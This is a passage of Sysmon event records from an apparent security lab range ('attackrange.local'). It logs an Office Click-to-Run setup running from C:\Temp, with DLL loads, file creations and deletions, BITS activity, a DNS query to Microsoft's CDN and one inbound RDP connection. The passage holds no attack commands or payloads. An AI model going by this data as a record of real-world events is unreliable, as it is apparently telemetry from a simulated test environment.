shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\AppVIsvStreamingManager.dll2021-04-20 14:53:37.925 11241100x800000000000000063188Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.925{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\AppVIsvApi.dll2021-04-20 14:53:37.925 11241100x800000000000000063187Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.910{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\AppVIntegration.dll2021-04-20 14:53:37.910 11241100x800000000000000063186Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.910{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\AppVFileSystemMetadata.dll2021-04-20 14:53:37.910 23542300x800000000000000063185Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.894{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=D31889F2454F5E41D2C322AC3B4DB7ED,SHA256=78073F84E939135E8230D5338463666AD04463D46A4080D495C219F732161A20,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063184Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:53:37.894{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\appvcleaner.exe2021-04-20 14:53:37.894 11241100x800000000000000063183Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.878{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\AppVCatalog.dll2021-04-20 14:53:37.878 11241100x800000000000000063182Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.878{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\ApiClient.dll2021-04-20 14:53:37.878 11241100x800000000000000063181Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.878{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\api-ms-win-crt-utility-l1-1-0.dll2021-04-20 14:53:37.878 11241100x800000000000000063180Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.878{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\api-ms-win-crt-time-l1-1-0.dll2021-04-20 14:53:37.878 11241100x800000000000000063179Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.878{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\api-ms-win-crt-string-l1-1-0.dll2021-04-20 14:53:37.878 11241100x800000000000000063178Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.878{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\api-ms-win-crt-stdio-l1-1-0.dll2021-04-20 14:53:37.878 11241100x800000000000000063177Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.878{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\api-ms-win-crt-runtime-l1-1-0.dll2021-04-20 14:53:37.878 11241100x800000000000000063176Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.878{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\api-ms-win-crt-process-l1-1-0.dll2021-04-20 14:53:37.878 11241100x800000000000000063175Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.878{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\api-ms-win-crt-private-l1-1-0.dll2021-04-20 14:53:37.878 11241100x800000000000000063174Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.878{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\api-ms-win-crt-multibyte-l1-1-0.dll2021-04-20 14:53:37.878 11241100x800000000000000063173Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.878{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\api-ms-win-crt-math-l1-1-0.dll2021-04-20 14:53:37.878 11241100x800000000000000063172Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.878{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\api-ms-win-crt-locale-l1-1-0.dll2021-04-20 14:53:37.878 11241100x800000000000000063171Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.878{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\api-ms-win-crt-heap-l1-1-0.dll2021-04-20 14:53:37.878 11241100x800000000000000063170Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.878{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\api-ms-win-crt-filesystem-l1-1-0.dll2021-04-20 14:53:37.878 11241100x800000000000000063169Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.878{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\api-ms-win-crt-environment-l1-1-0.dll2021-04-20 14:53:37.878 11241100x800000000000000063168Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.863{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\api-ms-win-crt-convert-l1-1-0.dll2021-04-20 14:53:37.863 11241100x800000000000000063167Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.863{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\api-ms-win-crt-conio-l1-1-0.dll2021-04-20 14:53:37.863 11241100x800000000000000063166Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.863{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\api-ms-win-core-xstate-l2-1-0.dll2021-04-20 14:53:37.863 11241100x800000000000000063165Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.863{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\api-ms-win-core-timezone-l1-1-0.dll2021-04-20 14:53:37.863 11241100x800000000000000063164Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.863{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\api-ms-win-core-synch-l1-2-0.dll2021-04-20 14:53:37.863 11241100x800000000000000063163Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.863{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\api-ms-win-core-processthreads-l1-1-1.dll2021-04-20 14:53:37.863 11241100x800000000000000063162Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.863{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\api-ms-win-core-localization-l1-2-0.dll2021-04-20 14:53:37.863 11241100x800000000000000063161Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.863{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\api-ms-win-core-file-l2-1-0.dll2021-04-20 14:53:37.863 11241100x800000000000000063160Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:37.863{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\api-ms-win-core-file-l1-2-0.dll2021-04-20 14:53:37.863 23542300x800000000000000063159Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.753{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=56A96D591683241936B340410D85CD11,SHA256=7C62B90B744683D605272470006CCDF0E2EF2FB8BF86498FA6A82B991A19A5EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063158Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.347{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\OfficeC2R77F5D1E0-A108-4C42-A14F-FA28C38EE8C1\BIT58A9.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063157Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.316{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\OfficeC2R77F5D1E0-A108-4C42-A14F-FA28C38EE8C1\BIT58A9.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000063156Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.300{A7A01FEF-B626-607E-1600-00000000BB01}15402648C:\Windows\system32\svchost.exe{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|c:\windows\system32\qmgr.dll+2f267|c:\windows\system32\qmgr.dll+2db8f|c:\windows\system32\qmgr.dll+1f9de|c:\windows\system32\qmgr.dll+1fd4c|c:\windows\system32\qmgr.dll+1fb85|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 23542300x800000000000000063155Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.300{A7A01FEF-EAEC-607E-660B-00000000BB01}6840ATTACKRANGE\AdministratorC:\Temp\OfficeSetup.exeC:\Users\ADMINI~1\AppData\Local\Temp\i640CheckReachable35EB7E13-4C01-4843-8742-322E02464FEFMD5=69691C7BDCC3CE6D5D8A1361F22D04AC,SHA256=08F271887CE94707DA822D5263BAE19D5519CB3614E0DAEDC4C7CE5DAB7473F1,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x4d 23542300x800000000000000063154Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.300{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\BIT5879.tmpMD5=93B885ADFE0DA089CDF634904FD59F71,SHA256=6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000063153Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.300{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\BIT5879.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063152Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.285{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA7E22275F9F4EF2FE7E6322CD9896DC,SHA256=DA27225671648B215C6297B0F0DF9C66BB672432D940FD6611CBC3203A94176C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049282Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:37.415{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A36368DE5B8253EF5D21A2D9FB4F8F02,SHA256=F8E9D5642DDA5FFE4B7B7AA4171F7DDA4B82C2790E5C656CC24F4B705FF3E5EF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049281Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:35.460{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57806-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000063151Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.269{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\BIT5879.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000063150Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.253{A7A01FEF-B626-607E-1600-00000000BB01}15402648C:\Windows\system32\svchost.exe{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|c:\windows\system32\qmgr.dll+2f267|c:\windows\system32\qmgr.dll+2db8f|c:\windows\system32\qmgr.dll+1f9de|c:\windows\system32\qmgr.dll+1fd4c|c:\windows\system32\qmgr.dll+1fb85|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 23542300x800000000000000063149Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.238{A7A01FEF-EAEC-607E-660B-00000000BB01}6840ATTACKRANGE\AdministratorC:\Temp\OfficeSetup.exeC:\Users\ADMINI~1\AppData\Local\Temp\OfficeC2RB2F07119-9254-435F-858F-4EBA7FB218F4\VersionDescriptor.xmlMD5=FCC5919E96990AEFD85C0A811FDC8874,SHA256=FE3517F4F19E4341F627AD914C4A5A329E228CD460883E426AA338D4A08C23E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063148Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.238{A7A01FEF-EAEC-607E-660B-00000000BB01}6840ATTACKRANGE\AdministratorC:\Temp\OfficeSetup.exeC:\Users\ADMINI~1\AppData\Local\Temp\OfficeC2RB2F07119-9254-435F-858F-4EBA7FB218F4\v64_16.0.13127.21348.cabMD5=A7367A698F0B945925048DAEEC5D2FBD,SHA256=EC50959B440B75F9DD514D508EF56BFFAB9972468DD1E7D860F87F09BE08279A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063147Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.238{A7A01FEF-EAEC-607E-660B-00000000BB01}6840ATTACKRANGE\AdministratorC:\Temp\OfficeSetup.exeC:\Users\ADMINI~1\AppData\Local\Temp\OfficeC2RB2F07119-9254-435F-858F-4EBA7FB218F4\v64.hashMD5=B5EBCE52855C958C3832EEA5476B4ACC,SHA256=799F789F2E7C7D4828797C29834644B928C849163C8F34E817836C5B3E956998,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063146Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.097{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40CB9923A74843B198C96DD31218761E,SHA256=ACE1E344BF6E6703A450FE1EFAAAAC2BA97D9D44EF2A03C2B2421E7BBB7FAA1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063145Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.097{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\OfficeC2RB2F07119-9254-435F-858F-4EBA7FB218F4\BIT57BD.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063144Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.066{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\OfficeC2RB2F07119-9254-435F-858F-4EBA7FB218F4\BIT57BD.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000063143Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.050{A7A01FEF-B626-607E-1600-00000000BB01}15406976C:\Windows\system32\svchost.exe{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|c:\windows\system32\qmgr.dll+2f267|c:\windows\system32\qmgr.dll+2db8f|c:\windows\system32\qmgr.dll+1f9de|c:\windows\system32\qmgr.dll+1fd4c|c:\windows\system32\qmgr.dll+1fb85|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 23542300x800000000000000063142Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.050{A7A01FEF-EAEC-607E-660B-00000000BB01}6840ATTACKRANGE\AdministratorC:\Temp\OfficeSetup.exeC:\Users\ADMINI~1\AppData\Local\Temp\v64_16.0.13127.21348CheckReachable2842872C-C141-4B16-A1F1-7817FA6004F8MD5=69691C7BDCC3CE6D5D8A1361F22D04AC,SHA256=08F271887CE94707DA822D5263BAE19D5519CB3614E0DAEDC4C7CE5DAB7473F1,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x4d 23542300x800000000000000063141Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.050{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\BIT576D.tmpMD5=93B885ADFE0DA089CDF634904FD59F71,SHA256=6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000063140Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:37.050{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\BIT576D.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049287Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:38.791{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22F21477301AEB40CF1F44FCF64530A9,SHA256=0D02C39807900E3E175E9F9F690607871B4F8B09DAEE5C82172F6CEFD2F7C641,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063283Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:38.972{A7A01FEF-EAEC-607E-660B-00000000BB01}6840ATTACKRANGE\AdministratorC:\Temp\OfficeSetup.exeC:\Users\ADMINI~1\AppData\Local\Temp\OfficeC2R77F5D1E0-A108-4C42-A14F-FA28C38EE8C1\i640.cabMD5=4811EE2B807068A9D4B8A46E1A81040B,SHA256=85387B43B7D3E3A442E6A9145CFDDBD1D5AF6CB320C3BA2F85AC2E4FBAC5A93C,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000063282Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:36.914{A7A01FEF-EAEC-607E-660B-00000000BB01}6840officecdn.microsoft.com.edgesuite.net0type: 5 officecdn.microsoft.com.edgesuite.net.globalredir.akadns.net;type: 5 a1737.dspw65.akamai.net;::ffff:2.16.106.224;::ffff:2.16.106.194;C:\Temp\OfficeSetup.exe 11241100x800000000000000063281Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.581{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\vcruntime140_1.dll2021-04-20 14:53:38.581 11241100x800000000000000063280Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.581{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\vcruntime140.dll2021-04-20 14:53:38.581 11241100x800000000000000063279Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.581{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft shared\ClickToRunOfficeC2RF4A54F4A-E39B-4B57-8B89-B586843FF1D0\vccorlib140.dll2021-04-20 14:53:38.581 11241100x800000000000000063278Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:53:38.566{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeC:\Program Files\Common Files\microsoft 